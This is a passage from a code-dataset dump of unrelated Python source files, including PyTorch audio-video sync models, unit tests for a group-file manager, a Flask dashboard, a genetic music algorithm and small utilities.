kernel_size=3, stride=1, padding=1, residual=True),\n Conv2d(256, 256, kernel_size=3, stride=1, padding=1, residual=True),\n\n Conv2d(256, 512, kernel_size=3, stride=1, padding=0),\n Conv2d(512, 512, kernel_size=1, stride=1, padding=0),)\n\n # @profile\n def forward(self, x):\n for layer in self.net:\n x = layer(x)\n return x\n\n\nclass Discriminator(nn.Module):\n\n def __init__(self, in_c, init_h_c=64, n_layers=5, image_size=256):\n super(Discriminator, self).__init__()\n\n self.in_conv = nn.Conv2d(in_c, init_h_c, padding=1, kernel_size=3, padding_mode='reflect')\n self.image_size = image_size\n self.final_size = image_size // (2 ** n_layers)\n downs = []\n nf = init_h_c\n for layer in range(n_layers):\n downs.append(DownBlock(nf, nf))\n # nf *= 2\n self.downs = nn.ModuleList(downs)\n\n # TODO: Add attention layer\n\n self.out_conv = nn.Sequential(\n nn.Conv2d(nf, nf, kernel_size=3, padding=1, padding_mode='reflect'),\n nn.LeakyReLU(0.2, True),\n nn.InstanceNorm2d(nf),\n nn.Conv2d(nf, 1, kernel_size=1)\n )\n\n #self.out_fc = nn.Sequential(\n # nn.Linear(nf * self.final_size * self.final_size, 512),\n # nn.LeakyReLU(0.2, True),\n # nn.Linear(512, 1)\n #)\n\n\n # @profile\n def forward(self, x):\n x = self.in_conv(x)\n for down in self.downs:\n x = down(x)\n return self.out_conv(x)\n\n\nclass Audio2Parameter(nn.Module):\n\n def __init__(self, n_params, cond_c=None):\n super(Audio2Parameter, self).__init__()\n self.audio_enc = AudioEncoder()\n\n self.n_in = 512\n self.use_cond = False\n if cond_c is not None:\n self.n_in += cond_c\n self.use_cond = True\n\n 
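# A minimal standalone sketch of the conditioning idiom Audio2Parameter uses
# above: the MLP input is widened by cond_c and the condition is concatenated
# in forward(). The names CondMLP, in_c, cond_c and out_c are illustrative
# placeholders, not taken from the original file.
import torch
import torch.nn as nn

class CondMLP(nn.Module):
    def __init__(self, in_c=512, cond_c=128, out_c=32):
        super().__init__()
        # the first Linear expects features plus condition, hence in_c + cond_c
        self.net = nn.Sequential(
            nn.Linear(in_c + cond_c, 256),
            nn.LeakyReLU(),
            nn.Linear(256, out_c),
        )

    def forward(self, x, cond):
        # concatenate along the feature dimension, then project
        return self.net(torch.cat((x, cond), dim=-1))

# usage: CondMLP()(torch.randn(4, 512), torch.randn(4, 128)) has shape (4, 32)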
self.MLP = nn.Sequential(\n            nn.Linear(self.n_in, 512),\n            nn.LeakyReLU(),\n\n            nn.Linear(512, 256),\n            nn.LeakyReLU(),\n\n            nn.Linear(256, n_params)\n        )\n\n    # @profile\n    def forward(self, audio, cond=None):\n        # audio = (B, 80, 16), cond = None or (B, C)\n        # out = (B, N)\n        if self.use_cond and cond is None:\n            raise ValueError('Condition is specified but not provided')\n\n        x = self.audio_enc(audio).reshape((audio.shape[0], 512))\n        if cond is not None:\n            x = torch.cat((x, cond), dim=-1)\n        return self.MLP(x)\n\n\nclass TripleSyncnet(nn.Module):\n    \"\"\"SyncNet with 3 inputs: audio, video, and parameters.\n    \"\"\"\n\n    def __init__(self, n_params, T=5):\n\n        super(TripleSyncnet, self).__init__()\n        self.audio_enc = AudioEncoder()\n\n        self.param_enc = nn.Sequential(\n            nn.Linear(n_params * T, 512),\n            nn.LeakyReLU(),\n\n            nn.Linear(512, 512),\n            nn.LeakyReLU(),\n\n            nn.Linear(512, 512),\n            nn.LeakyReLU(),\n\n            nn.Linear(512, 512)\n        )\n\n        self.video_enc = nn.Sequential(\n            nn.Conv2d(3 * T, 64, kernel_size=3, stride=1, padding=1),\n            nn.LeakyReLU(),\n\n            DownBlock(64, 64),  # (B, 64, 128, 128)\n            DownBlock(64, 64),  # (B, 128, 64, 64)\n            DownBlock(64, 64),  # (B, 256, 32, 32)\n            DownBlock(64, 128),  # (B, 256, 16, 16)\n            DownBlock(128, 128),  # (B, 256, 8, 8)\n            DownBlock(128, 128),  # (B, 256, 4, 4)\n            DownBlock(128, 256),  # (B, 256, 2, 2)\n            DownBlock(256, 512),  # (B, 512, 1, 1)\n        )\n\n    # @profile\n    def forward(self, audio=None, params=None, video=None):\n        # Audio = (B, 80, 16), params = (B, T, C), video = (B, 3, 256, 256)\n\n        audio_enc = None\n        if audio is not None:\n            audio_enc = self.audio_enc(audio)\n            audio_enc = F.normalize(audio_enc, dim=-1)\n\n        param_enc = None\n        if params is not None:\n            param_enc = self.param_enc(params)\n            param_enc = F.normalize(param_enc, dim=-1)\n\n        video_enc = None\n        if video is not None:\n            video = video.reshape((video.shape[0], -1, video.shape[2], video.shape[3]))\n            video = self.video_enc(video)\n            video_enc = F.normalize(video, dim=-1)\n\n        return audio_enc, param_enc, video_enc\n\n    def _compute_loss(self, enc_a, enc_b, is_same):\n\n        similarity = F.cosine_similarity(enc_a, enc_b, dim=-1)\n        if is_same:\n            target = torch.ones_like(similarity)\n        else:\n            target = torch.zeros_like(similarity)\n\n        loss = F.binary_cross_entropy(similarity, target)\n        return loss\n\n    def compute_loss(self, audio_enc_a=None, param_enc_a=None, video_enc_a=None,\n                     audio_enc_b=None, param_enc_b=None, video_enc_b=None):\n\n        loss = 0\n\n        if audio_enc_a is not None:\n            if audio_enc_b is not None:\n                loss += self._compute_loss(audio_enc_a, audio_enc_b, is_same=False)\n            if param_enc_b is not None:\n                loss += self._compute_loss(audio_enc_a, param_enc_b, is_same=False)\n            if video_enc_b is not None:\n                loss += self._compute_loss(audio_enc_a, video_enc_b, is_same=False)\n            if param_enc_a is not None:\n                loss += self._compute_loss(audio_enc_a, param_enc_a, is_same=True)\n            if video_enc_a is not None:\n                loss += self._compute_loss(audio_enc_a, video_enc_a, is_same=True)\n\n        if param_enc_a is not None:\n            if audio_enc_b is not None:\n                loss += self._compute_loss(param_enc_a, audio_enc_b, is_same=False)\n            if param_enc_b is not None:\n                loss += self._compute_loss(param_enc_a, param_enc_b, is_same=False)\n            if video_enc_b is not None:\n                loss += self._compute_loss(param_enc_a, video_enc_b, is_same=False)\n            if video_enc_a is not None:\n                loss += self._compute_loss(param_enc_a, video_enc_a, is_same=True)\n\n        if video_enc_a is not None:\n            if audio_enc_b is not None:\n                loss += self._compute_loss(video_enc_a, audio_enc_b, 
is_same=False)\n if param_enc_b is not None:\n loss += self._compute_loss(video_enc_a, param_enc_b, is_same=False)\n if video_enc_b is not None:\n loss += self._compute_loss(video_enc_a, video_enc_b, is_same=False)\n\n if audio_enc_b is not None:\n if param_enc_b is not None:\n loss += self._compute_loss(audio_enc_b, param_enc_b, is_same=True)\n if video_enc_b is not None:\n loss += self._compute_loss(audio_enc_b, video_enc_b, is_same=True)\n\n if param_enc_b is not None:\n if video_enc_b is not None:\n loss += self._compute_loss(param_enc_b, video_enc_b, is_same=True)\n\n return loss\n","repo_name":"oijoijcoiejoijce/BigDub","sub_path":"networks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"32921767395","text":"#!/usr/bin/python3\n\nfrom os import unlink\nfrom os import mkdir\nfrom shutil import copyfile\nimport unittest\n\nimport groupman\n\n\nclass TestGroupManager(unittest.TestCase):\n def setUp(self):\n try:\n mkdir(\"build\", 0o755)\n except FileExistsError:\n pass\n try:\n unlink(\"build/group\")\n except FileNotFoundError:\n pass\n copyfile(\"data/group\", \"build/group\")\n\n def test_parse_groups(self):\n manager = groupman.parse_group_file(\"build/group\")\n self.assertEqual(5, len(manager.groups))\n self.assertEqual('admins', manager.group_by_name['admins'].name)\n self.assertEqual('test', manager.group_by_id['5000'].name)\n self.assertEqual(2, len(manager.group_by_name['admins'].users))\n\n def test_add(self):\n group = groupman.Group(\"groupname:x:1:init\")\n self.assertEqual(1, len(group.users))\n group.exec_line(\"+newval\")\n self.assertEqual(2, len(group.users))\n\n def test_remove(self):\n group = groupman.Group(\"groupname:x:1:init\")\n self.assertEqual(1, len(group.users))\n group.exec_line(\"-init\")\n self.assertEqual(0, len(group.users))\n\n def test_group_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init\", str_val)\n\n def test_group_add_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n group.exec_line(\"+newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init,newval\", str_val)\n\n def test_group_remove_to_string(self):\n group = groupman.Group(\"groupname:x:1:init,newval\")\n group.exec_line(\"-newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init\", str_val)\n\n def test_group_add_duplicate_to_string(self):\n group = groupman.Group(\"groupname:x:1:init,newval\")\n group.exec_line(\"+newval\")\n str_val = group.to_string()\n self.assertEqual(\"groupname:x:1:init,newval\", str_val)\n\n def test_manager_to_string(self):\n group = groupman.Group(\"groupname:x:1:init\")\n manager = groupman.GroupMan([group])\n self.assertEqual(1, len(manager.groups))\n str_val = manager.to_string()\n self.assertEqual(\"groupname:x:1:init\\n\", str_val)\n\n def test_end_to_end(self):\n manager = groupman.parse_group_file(\"build/group\")\n before = manager.group_by_name[\"admins\"].to_string()\n self.assertEqual(\"admins:x:1000:anne,prithi\", before)\n manager.exec_files(\"data/group.d\")\n after = manager.group_by_name[\"admins\"].to_string()\n self.assertEqual(\"admins:x:1000:adam,anne\", after)\n\n def test_execute(self):\n group_file = \"build/group\"\n\n fd = open(group_file, \"rt\")\n before = fd.readlines()\n fd.close()\n \n manager = groupman.execute(group_file, \"data/group.d\")\n\n 
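# A small sketch of the before/after pattern this test relies on: snapshot the
# file's lines, run the operation, re-read, and compare positionally. The
# helper name diff_lines is illustrative and not part of groupman itself.
def diff_lines(before, after):
    # lines are compared pairwise by position; only changed lines are returned
    assert len(before) == len(after), "line counts should match"
    return [(i, b, a) for i, (b, a) in enumerate(zip(before, after)) if b != a]

# e.g. diff_lines(["a\n", "b\n"], ["a\n", "c\n"]) == [(1, "b\n", "c\n")]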
fd = open(group_file, \"rt\")\n        after = fd.readlines()\n        fd.close()\n        num_lines = len(before)\n        self.assertEqual(num_lines, len(after))\n        for i in range(num_lines):\n            before_line = before[i]\n            after_line = after[i]\n            if before_line.startswith(\"admins\"):\n                self.assertEqual('admins:x:1000:anne,prithi\\n', before_line)\n                self.assertEqual('admins:x:1000:adam,anne\\n', after_line)\n            else:\n                self.assertEqual(before_line, after_line)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"admiyo/groupman","sub_path":"groupman/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33470699483","text":"\"\"\"Provide constant values.\"\"\"\nCOLORS = {\n    \"black\": (0x00, 0x00, 0x00),\n    \"blue\": (0x00, 0x00, 0xFF),\n    \"cyan\": (0x00, 0xFF, 0xFF),\n    \"green\": (0x00, 0xFF, 0x00),\n    \"pink\": (0x80, 0x00, 0x80),  # purple not pink\n    \"red\": (0xFF, 0x00, 0x00),\n    \"white\": (0xFF, 0xFF, 0xFF),\n    \"yellow\": (0xFF, 0xFF, 0x00),\n}\nCONFIG_FILE = \"config.json\"\n","repo_name":"jalmeroth/FelixTheCat","sub_path":"upython/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3978984175","text":"import numpy as np\nimport scipy as sp\nfrom scipy.linalg import pinv as inverse\nimport scipy.linalg\nfrom math import pi,sqrt\nimport matplotlib.pyplot as py\nfrom functools import partial\n\n#R comes with a 1/sqrt(2) (I think)?\n\ndef globalNewton(funcs,b,J,tol=10**-4,lmin=10**-1,halt=False):\n    'Globally convergent Newton algorithm'\n    def X(x):\n        'Converts a matrix into a numpy array with boson labels'\n        temp = np.array([0+0*1j],dtype=[(amp,'complex64') for amp in ('D','E','up','dn','Dstar','Estar','upstar','dnstar','l0','lup','ldn')])\n        for i,bos in enumerate(['l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar']):\n            temp[bos] = x[i]\n        return temp\n\n    #1.) Compute Newton direction\n    mixPrev = 1\n    mix = 1\n    g = lambda funcs,b: 0.5*sp.linalg.norm([f(b) for f in funcs])**2\n    dg = lambda df,dx: (df*dx)[0,0]\n    x = sp.matrix([complex(b[bos]) for bos in ('l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar')])\n    F = sp.matrix([f(b) for f in funcs]).transpose()\n    xnew = -inverse(J)*F\n    g1 = g(funcs,X(x.transpose()+xnew))\n    g0 = g(funcs,b)\n    #dF = sp.matrix([f(X(x.transpose()+xnew))-f(b) for f in funcs])\n    dF = np.conj(F).transpose()*J #Do we need F conjugate?? 
Then we are minimizing conj(F) F which is presubably the proper measure\n itern = 0\n #print(g1 - g0 - tol*dg(dF,xnew))\n while g1 - g0 - tol*dg(dF,xnew)>0 and itern<10:\n #print(\"Iteration number {}\".format(itern))\n #print(\"g0 = {}\".format(g0))\n if itern == 0:\n mix = np.real(-0.5*dg(dF,xnew)/(g1-g0-dg(dF,xnew)))\n #print(\"Mixing parameter = {}\".format(mix))\n '''\n if mix<0.1:\n print(g1)\n gvals = [g(funcs,X(x.transpose()+l0*0.3*xnew/50)) for l0 in range(50)]\n py.plot([0.3*k/50 for k in range(50)],gvals,'o')\n py.hlines(g0,0,0.3)\n py.show()\n '''\n if mix1:\n mix = 0.1\n #raise Exception(\"Newton step divergent\")\n #print(\"Size of correction vector: {}\".format(sizeofCorr))\n if mix10**-8:\n #print(sizeofCorr)\n cnt = 'y'\n #py.plot(Rvals,'x')\n #py.show()\n #cnt = input(\"Continue?, y/n\")\n elif sizeofCorr<10**-8:\n cnt = 'n'\n #print(Rvals[-1])\n R_converged.append(sqrt(Rvals[-1]))\n print(R_converged[-1])\n #quit()\n #print(\"Particle density = {}\".format(dms[0][0,0]))\n '''\n b_new = -inverse(J)*g\n mixing = 10**-3\n #mixing = 1\n for i,v in enumerate(('l0','lup','ldn','E','D','up','dn','Estar','Dstar','upstar','dnstar')):\n new = b[v] + complex(b_new[i])\n b[v] = (1-mixing)*b[v] + mixing*new\n '''\nsp.savez('results_D={}_c={}_N={}'.format(bwidth,cstrength,N),Uvals=Uval,R=R_converged,delta=delta)\npy.plot([u/(pi*delta) for u in Uval],R_converged,'x')\npy.show()\n #results = np.vstack([results,b])\n #print(bosDens)","repo_name":"sean-harding/slaveBoson","sub_path":"slaveboson.py","file_name":"slaveboson.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33891606471","text":"# Import Meteostat library and dependencies\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom meteostat import Point, Daily\n\n# Set time period\nstart = datetime(2014, 1, 1)\nend = datetime(2021, 12, 31)\n\n# Create Point for Wandersleben\nwandersleben = Point(50.897598, 10.853470, 70)\n\n# Get daily data from 2014 until 2021\ndata = Daily(wandersleben, start, end)\ndata = data.fetch()\n\n# Plot line chart including average, minimum and maximum temperature\ndata.plot(y=['tsun'])\nplt.show()\n\n\n\n\n","repo_name":"moritzmersch/Project_fantastic_five","sub_path":"fetch_weatherdata_WL.py","file_name":"fetch_weatherdata_WL.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"28586453026","text":"import random\nfrom sklearn.externals import joblib\nimport numpy as np\n\n\nclass Genetic:\n miss_start = -1\n miss_end = -1\n genome_length = 0\n notes_before = []\n notes_after = []\n mutation_rate = 0.1\n guesser = None\n total_best_score = 1000000\n best_population = []\n\n def __init__(self, song):\n for index, note in enumerate(song):\n if note == 0 and self.miss_start == -1:\n self.miss_start = index\n if note != 0 and self.miss_start != -1 and self.miss_end == -1:\n self.miss_end = index\n\n self.genome_length = self.miss_end - self.miss_start\n\n self.notes_before = song[self.miss_start - 20:self.miss_start]\n self.notes_after = song[self.miss_end:self.miss_end + 20]\n\n self.max = max(song)\n for index, note in enumerate(song):\n if note == 0:\n song[index] = self.max\n self.min = min(song)\n\n self.guesser = joblib.load(\"guesser\")\n\n def make_population(self, count):\n populations = []\n for i in range(count):\n temp_list = [random.randint(self.min, self.max) for iter in 
range(self.genome_length)]\n            populations.append(temp_list)\n        # print(\"generated {} populations with length of {}!\".format(count, self.genome_length))\n        return populations\n\n    def score_population(self, pop):\n        pop = self.notes_before[-5:] + pop + self.notes_after[:5]\n        total_score = 0\n        reducers = []\n        test_data = []\n        for index, note in enumerate(pop[5:-5]):\n            real_index = index + 5\n            test_data_temp = pop[real_index - 5: real_index] + pop[real_index + 1:real_index + 5]\n            # print(test_data_temp)\n            reducer = test_data_temp[0]\n            reducers.append(reducer)\n            for ii, nn in enumerate(test_data_temp):\n                test_data_temp[ii] = nn - reducer\n            test_data.append(test_data_temp)\n\n        test_results = self.guesser.predict(np.array(test_data))\n        for ti, tv in enumerate(test_results):\n            test_results[ti] = tv + reducers[ti]\n\n        for index, note in enumerate(pop[5:-5]):\n            guessed_note = test_results[index]  # find out what was supposed to be here\n            temp_score = abs(guessed_note - note)\n            # print(temp_score)\n            total_score += temp_score\n        # print(total_score)\n        return total_score\n\n    def mutate_population(self, pop):\n        rand_position = random.randint(0, self.genome_length - 1)\n        random_note = random.randint(self.min, self.max)\n        # print(\"mutating a population at position {} with the note {}!\".format(rand_position, random_note))\n        pop[rand_position] = random_note\n        # print(pop[rand_position])\n        return pop\n\n    def mix_genomes(self, g1, g2):\n        pivot1 = random.randint(0, self.genome_length // 2)\n        pivot2 = random.randint(pivot1 + (self.genome_length // 4), self.genome_length)\n\n        rg1 = g1.copy()  # return genome 1\n        rg2 = g2.copy()  # return genome 2\n\n        rg1[pivot1:pivot2] = g2[pivot1: pivot2]\n        rg2[pivot1:pivot2] = g1[pivot1: pivot2]\n\n        # print(\"-----------\")\n        # print(pivot1, pivot2)\n        # print(g1)\n        # print(rg1)\n        # print(g2)\n        # print(rg2)\n        mutation_rand = random.uniform(0.00, 10.00)\n        if mutation_rand <= (self.mutation_rate * 10):\n            rg1 = self.mutate_population(rg1)\n            # print(\"mutate rg1!\")\n        mutation_rand = random.uniform(0.00, 10.00)\n        if mutation_rand <= (self.mutation_rate * 10):\n            rg2 = self.mutate_population(rg2)\n            # print(\"mutate rg2!\")\n\n        return rg1, rg2\n\n    def run(self, iterations_count=5):\n        populations_count = 100\n        populations = self.make_population(populations_count)\n        scores = [0] * populations_count\n\n        i = 0\n        while True:\n            # score each population\n            min_score = 10000\n            for j, pop in enumerate(populations):\n                scores[j] = self.score_population(populations[j])\n                if scores[j] < self.total_best_score:\n                    self.total_best_score = scores[j]\n                    self.best_population = pop\n                if scores[j] < min_score:\n                    min_score = scores[j]\n            # print(\"best score was {}\".format(min_score))\n            # sort populations by score. since the lower the score the better population is, first 30 are the best\n            populations = [x for _, x in sorted(zip(scores, populations))]\n            # after sorting populations break if the iteration counts are finished\n            if i > iterations_count:\n                break\n            new_population = [0] * populations_count\n            # mix the first 30 for the first 60 of populations\n            for index, pop in enumerate(populations[:int(0.3 * populations_count)]):\n                couple_pop = populations[int(0.6 * populations_count) - index]\n                # print(index, int(0.6 * populations_count) - index)\n                new_population[index * 2], new_population[(index * 2) + 1] = self.mix_genomes(pop, couple_pop)\n            # make 40 new genomes for the last 40 populations\n            new_population[int(0.6 * populations_count):] = self.make_population(int(0.4 * populations_count))\n            populations = new_population\n            i += 1\n\n        print(\"best score in total was {}\".format(self.total_best_score))\n        print(self.best_population)\n        return self.best_population\n","repo_name":"jimist/midi_genetic","sub_path":"genetic.py","file_name":"genetic.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26082410113","text":"from enum import Enum\nimport json\n\n\nclass Color(Enum):\n    RED = 1\n    GREEN = 2\n    BLUE = 3\n\n\nprint(type(Color.RED))  # <enum 'Color'>\nprint(isinstance(Color.RED, Color))  # True\nprint(Color.RED.name)  # RED\nprint(Color.RED.value)  # 1\nprint(Color.RED in Color)  # True\nprint(Color.RED == 1)  # False\nprint(Color.RED is 1)  # False\n\nrgb = {\n    Color.RED: '#ff0000',\n    Color.GREEN: '#00ff00',\n    Color.BLUE: '#0000ff'}\n\nprint(Color(1))\nprint(Color['RED'] == Color(1))  # True\n\nfor color in Color:\n    print(color)\nprint(list(Color))\n\n# Errors:\n#Color['YELLOW'] = 3\n#Color.RED.value = 100\n\n\nclass Color(Enum):\n    pass\n\n\nclass RGB(Color):\n    RED = 1\n    GREEN = 2\n    BLUE = 3\n\n\nclass RGBA(RGB):\n    ALPHA = 4\n\n\nclass ResponseStatus(Enum):\n    PENDING = 'pending'\n    FULFILLED = 'fulfilled'\n    REJECTED = 'rejected'\n\n\nresponse = '{\"status\": \"fulfilled\"}'\ndata = json.loads(response)\nstatus = data['status']\nprint(ResponseStatus(status))\n","repo_name":"damiansp/completePython","sub_path":"pytut/enum_.py","file_name":"enum_.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42741173925","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\nimport json\nimport connectingToDB as surgDB\nfrom MyJSONEncoder import MyJSONEncoder\nfrom datetime import datetime\n\napp = Flask(__name__)\napp.json_encoder = MyJSONEncoder\n\n@app.route('/')\ndef index():\n    return render_template(\"index.html\")\n\n@app.route('/movement')\ndef movement():\n    return render_template(\"movement.html\")\n\n@app.route('/search')\ndef search():\n    return render_template(\"search.html\")\n\n@app.route('/search/allTerms')\ndef search_allTerms():\n    colNames = [\"label\", \"category\", \"value\"]\n    allData = surgDB.getJSON(\"ServerDatafiles/getSearchSuggestions.sql\", colNames)\n    return jsonify(allData)\n\n@app.route(\"/dashboard/search/<id>/<category>\")\ndef dashboard_search(id, category):\n    colNames = [\"ClinicDate\", \"IsDirect\", \"WasScreened\", \"ScreenDate\", \"IsSurgical\", \"AppScore\", \"ComplexityScore\"]\n    colNames += [\"ValueScore\", \"Location\", \"Name\", \"Diagnosis\", \"Referring_Doc\", \"Practice\", \"Insurance\", \"IsMedicaid\"]\n\n    allPatientData = 
surgDB.customSearchQuery(category, id, colNames)\n return jsonify(allPatientData)\n\n\n@app.route(\"/dashboard/patients\")\ndef dashboard_patients():\n colNames = [\"ClinicDate\", \"IsDirect\", \"WasScreened\", \"ScreenDate\", \"IsSurgical\", \"AppScore\", \"ComplexityScore\"]\n colNames += [\"ValueScore\", \"Location\", \"Diagnosis\", \"Referring_Doc\", \"Practice\", \"Insurance\", \"IsMedicaid\"]\n allPatients_json = surgDB.getJSON(\"ServerDatafiles/mainSelect.sql\", colNames)\n return jsonify(allPatients_json)\n\n@app.route(\"/dashboard/movement\")\ndef dashboard_movement():\n \n colNames = [\"Type\", \"Name\", \"ThisYear\", \"ThisQuarter\", \"NumPatients\", \"NumSurgical\", \"LastYear\", \"LastQuarter\"]\n colNames += [\"LastPatients\", \"LastSurgical\", \"qAvgPatients\", \"qAvgSurgical\"]\n print(datetime.now().time())\n allPatientChanges = surgDB.getJSON(\"ServerDatafiles/PercChangeSelect.sql\", colNames)\n print(datetime.now().time())\n dataReturn = jsonify(allPatientChanges)\n print(datetime.now().time())\n return dataReturn\n\nif __name__ == '__main__':\n app.run()","repo_name":"srikasip/surgeryDash","sub_path":"dashboardserver.py","file_name":"dashboardserver.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20405633102","text":"def problem2():\r\n\twith open(\"Day10/input2.txt\") as f:\r\n\t lines = f.read().splitlines() \r\n\tlines = [x.strip(\"\") for x in lines]\r\n\r\n\tbrackets_dict = {\"(\": \")\", \")\": \"(\", \"{\": \"}\", \"}\": \"{\", \"[\": \"]\", \"]\": \"[\", \"<\": \">\", \">\": \"<\"}\r\n\tbrackets_score = {\")\": 1, \"]\": 2, \"}\": 3, \">\": 4}\r\n\topen_chars = \"({[<\"\r\n\tclose_chars = \")}]>\"\r\n\r\n\tscores = []\r\n\r\n\tfor line in lines:\r\n\t\tline_score = 0\r\n\t\tstack = []\r\n\t\tcorrupted = False\r\n\r\n\t\tfor char in line:\r\n\t\t\tif char in open_chars:\r\n\t\t\t\tstack.append(char)\r\n\t\t\telse:\r\n\t\t\t\tif stack.pop() != brackets_dict[char]:\r\n\t\t\t\t\tcorrupted = True\r\n\t\t\t\t\tbreak\r\n\r\n\t\tif not corrupted:\r\n\t\t\tfor char in reversed(stack):\r\n\t\t\t\tclose_bracket = brackets_dict[char]\r\n\t\t\t\tline_score = (line_score * 5) + brackets_score[close_bracket]\r\n\t\t\r\n\t\t\tscores.append(line_score)\r\n\r\n\tscores.sort()\r\n\r\n\treturn scores[len(scores)//2]\r\n\t\r\nprint(problem2())","repo_name":"antoine1242/AdventOfCode","sub_path":"2021/Day10/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18122780816","text":"from tkinter import *\nimport tkinter as tk \nimport main,client\nfrom tkinter import messagebox\ndef mainPage():\n root.destroy()\n main.Display()\n\ndef createService():\n check=client.add_service(entry_1.get(),entry_2.get(),entry_3.get())\n if(check==0):\n messagebox.showerror(None,\"Account is not logged in\")\n elif(check==1):\n messagebox.showinfo(None,\"Congrats you added a new Service!\")\n \ndef Display():\n global root\n global entry_1\n global entry_2\n global entry_3\n root=tk.Tk()\n root.state('zoomed')\n label = tk.Label(text=\"Create a New service \")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n button = tk.Button(text=\"Main\",command=mainPage)\n button.pack(side = BOTTOM)\n \n label2 = tk.Label(text = \"Service Name: \",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label2.place(x =5, y=130)\n label3 = tk.Label(text = \"Username: 
\",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label3.place(x =5, y=180)\n label4 = tk.Label(text = \"Password: \",bg = \"white\", width = 15, font = (\"arial\", 10,\"bold\")) \n label4.place(x =5, y=230)\n submit=tk.Button(text=\"Submit\",command=createService)\n submit.place(x=10,y=280)\n \n entry_1 = tk.Entry(root)\n entry_1.place(x = 115, y =130)\n entry_2 = tk.Entry(root)\n entry_2.place(x = 115, y =180)\n entry_3 = tk.Entry(root)\n entry_3.place(x=115, y=230)\n ","repo_name":"etoy22/Password-Manager","sub_path":"Password-Manager-main/Client Files/Service.py","file_name":"Service.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73643909521","text":"import os\nimport sys\ndrive, path = os.path.splitdrive(os.path.dirname(os.path.realpath(__file__)))\nsys.path.insert(0, os.path.join(drive, os.sep, *path.split(os.sep)[:2]))\nfrom auxiliary.paths import model_paths_imagenet, model_paths_imdb\nfrom auxiliary.settings import models, seed\nfrom data.dataloaders import load_data\nimport torch\nfrom tqdm import tqdm\n\n# ----------------------------------------\ntorch.manual_seed(seed)\n# ----------------------------------------\n\n\nclass ParameterRandomization:\n\n def __init__(self, model_type=\"inception_v3\"):\n\n self.model_type = model_type\n\n if 'lstm' in self.model_type:\n self.dataset = \"imdb\"\n TEXT, vocab_size, word_embeddings, train_iter, valid_iter, test_iter = load_data.load_dataset()\n batch_size = 32\n output_size = 2\n hidden_size = 256\n embedding_length = 300\n self.base_model = models[self.model_type](batch_size, output_size, hidden_size,\n vocab_size, embedding_length, word_embeddings)\n self.base_model.load_state_dict(torch.load(model_paths_imdb[self.model_type]))\n self.destination_path = os.path.join(os.path.dirname(\n model_paths_imdb[self.model_type]),\n self.model_type + \"_randomized\")\n\n else:\n self.dataset = \"imagenet\"\n self.base_model = models[self.model_type](init_weights=False)\n self.base_model.load_state_dict(torch.load(model_paths_imagenet[self.model_type]))\n self.destination_path = os.path.join(os.path.dirname(\n model_paths_imagenet[self.model_type]),\n self.model_type + \"_randomized\")\n\n os.makedirs(self.destination_path, exist_ok=True)\n self.important_layers = {}\n\n self.store_original_parameters()\n self.save_randomized_models()\n\n def store_original_parameters(self):\n\n model_blocks = []\n\n if self.model_type == \"inception_v3\":\n model_blocks = [\"conv2d_1a\", \"conv2d_2a\", \"conv2d_2b\", \"conv2d_3b\",\n \"conv2d_4a\", \"mixed_5b\", \"mixed_5c\", \"mixed_5d\",\n \"mixed_6a\", \"mixed_6b\", \"mixed_6c\", \"mixed_6d\",\n \"mixed_6e\", \"mixed_7a\", \"mixed_7b\", \"mixed_7c\",\n \"logits\"]\n\n elif self.model_type == \"mobilenet_v2\":\n model_blocks = [\"features.\" + str(i) for i in range(0, 19)]\n\n elif self.model_type == \"vgg_16\":\n model_blocks = [\"features.0\", \"features.2\", \"features.5\",\n \"features.7\", \"features.10\", \"features.12\",\n \"features.14\", \"features.17\", \"features.19\",\n \"features.21\", \"features.24\", \"features.26\",\n \"features.28\"]\n\n elif self.model_type == \"resnet_18\":\n model_blocks = []\n for first_idx in range(1, 5):\n for second_idx in range(0, 2):\n model_blocks.append('layer'+str(first_idx)+'.'+str(second_idx))\n\n elif self.model_type == \"resnet_50\":\n model_blocks = []\n for first_idx in range(1, 5):\n if first_idx == 1:\n for second_idx in range(0, 
